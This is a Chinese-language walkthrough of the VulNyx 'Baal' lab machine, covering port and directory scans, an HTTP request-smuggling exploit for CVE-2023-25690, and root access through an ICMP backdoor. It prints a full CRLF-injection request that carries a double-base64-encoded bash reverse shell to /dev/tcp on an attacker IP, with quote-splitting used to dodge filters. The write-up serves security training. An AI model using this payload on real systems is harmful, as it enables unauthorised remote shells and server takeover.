首页 靶场练习 VulNyx Medium

# 靶场搭建

下载:Baal

Nat,IP: 192.168.1.156

# 渗透过程

# 信息初收集

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 3a:dc:d6:1d:84:b6:96:c0:8f:96:1e:65:a0:24:0e:fb (ECDSA)
|_  256 de:93:17:fb:3a:19:9c:e0:17:32:2d:a9:73:f7:c5:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.55 ((Unix))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.55 (Unix)
┌──(root㉿kali)-[~]
└─# dirb http://192.168.1.156
-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Mon May 27 22:00:22 2024
URL_BASE: http://192.168.1.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                          
---- Scanning URL: http://192.168.1.156/ ----
+ http://192.168.1.156/index.html (CODE:200|SIZE:45)                                                  
==> DIRECTORY: http://192.168.1.156/mod/                                                              
                                                                                                      
---- Entering directory: http://192.168.1.156/mod/ ----
+ http://192.168.1.156/mod/.git/HEAD (CODE:200|SIZE:151)                                              
+ http://192.168.1.156/mod/.svn/entries (CODE:200|SIZE:151)                                           
+ http://192.168.1.156/mod/_vti_bin/_vti_adm/admin.dll (CODE:200|SIZE:164)                            
+ http://192.168.1.156/mod/_vti_bin/_vti_aut/author.dll (CODE:200|SIZE:164)                           
+ http://192.168.1.156/mod/_vti_bin/shtml.dll (CODE:200|SIZE:155)                                     
+ http://192.168.1.156/mod/cgi-bin/ (CODE:200|SIZE:154)                                               
+ http://192.168.1.156/mod/CVS/Entries (CODE:200|SIZE:150)                                            
+ http://192.168.1.156/mod/CVS/Repository (CODE:200|SIZE:150)                                         
+ http://192.168.1.156/mod/CVS/Root (CODE:200|SIZE:150)                                               
+ http://192.168.1.156/mod/index.html (CODE:200|SIZE:95)                                              
                                                                                                      
-----------------
END_TIME: Mon May 27 22:00:31 2024
DOWNLOADED: 9224 - FOUND: 11
存在 http 走私:CVE-2023-25690
通过 CRLF 注入的方法构造 host 头部,根据提示构造 host baal.vulnyx ,URI: proxy.php?ping=127.0.0.1 ,再加一个 RCE 的 payload
将 http 请求的第一行替换成如下 paylaod:
GET /mod/test/%20HTTP/1.1%0D%0AHost:%20baal.vulnyx%0D%0A%0D%0AGET%20/proxy.php%3Fping%3D127.0.0.1/%3Becho%24%7BIFS%7DWW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE9USXVNVFk0TGpFdU1USTVMelEwTkRRZ01ENG1NUT09%7Cba''se''6''4%24%7BIFS%7D-''d%7Cba''se''64%24%7BIFS%7D-''d%7Cb''a''s''h%3B/ HTTP/1.1
中间的 base64 编码是 bash -i >& /dev/tcp/192.168.1.129/4444 0>&1 编码两次,一次不行,可能是因为中间出现的 +
拿到 shell
# 提权
www 目录下有 .id_rsa_hammon ,搞下来连上去
sudo -l 发现有一个 /root/pingto.sh ,RCE 没有办法。
pspy 监控一下进程,发现好像走的 ens33 网卡,但是我的网卡好像是 eth0,所以还需要在配置
看了一下 wp,说是执行 pingto 的时候输入 IP 之后会执行命令,给出提示 34393433346435303634366636663732
┌──(root㉿kali)-[~]
└─# echo '34393433346435303634366636663732' | xxd -r -p | xxd -r -p
ICMPdoor
ICMPdoor 用这个项目的 cnc 直接连过去:icmpdoor
拿到 root 的 shell